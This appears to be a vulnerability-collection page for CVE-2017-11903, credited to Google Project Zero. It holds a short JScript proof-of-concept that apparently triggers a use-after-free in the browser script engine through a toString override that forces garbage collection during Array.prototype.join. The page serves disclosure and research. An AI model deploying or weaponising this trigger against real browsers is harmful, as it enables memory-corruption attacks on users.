Skip to content

Latest commit

 

History

History
30 lines (21 loc) · 549 Bytes

CVE-2017-11903.md

File metadata and controls

30 lines (21 loc) · 549 Bytes

CVE-2017-11903

  • Report: Oct 2017
  • Fix: Dec 2017
  • Credit: ifratric of Google Project Zero

PoC

<script language="Jscript.Encode">

var vars = new Array(100);
for(var i=0;i<100;i++) vars[i] = {};

function f() {
  vars[1] = 1;
  CollectGarbage();
  return {};
}

vars[1].toString = f;
Array.prototype.join.call(vars);

</script>

Reference